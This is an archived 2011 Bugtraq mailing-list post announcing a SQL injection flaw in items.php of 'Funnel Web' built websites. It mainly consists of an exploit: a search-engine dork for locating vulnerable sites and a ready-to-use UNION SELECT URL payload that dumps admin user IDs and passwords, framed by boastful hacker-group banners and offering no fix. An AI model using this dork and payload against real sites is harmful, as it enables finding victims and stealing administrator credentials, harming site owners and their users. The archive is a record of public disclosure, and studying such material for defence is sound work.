lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Tue, 26 Jul 2011 08:50:39 GMT From: ehsan_hp200@...mail.com To: bugtraq@...urityfocus.com Subject: Funnel Web (items.php?&cat_id) Remote SQL injection Vulnerability ############################### IRANIAN THE BEST HACKERS IN THE WORLD ################## #################### #################### ## ## Remote SQL injection Vulnerability ## ## Funnel Web (items.php?&cat_id) ## ############################################################### ############################################################### ############################################################### ############################################################### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : Ehsan_Hp200@...mail.com ## ## Vendor : http://www.funnel-web.com.au/ ## ## Persian Gulf 4 Ever! ############################# ############################# ############################# ############################# ############################# ## ## Dork : "Web site design by Funnel Web" "inurl:items.php" Exploite: www.victim.com/items.php?&cat_id=-1+Union+Select+1,concat(user_id,0x3a,user_pw),1+From+admin-- ######################################################################################### SpeCial TanX To : Dj7Xpl ########################################################################################## ############################### IRANIAN THE BEST HACKERS IN THE WORLD ##################
Powered by blists - more mailing lists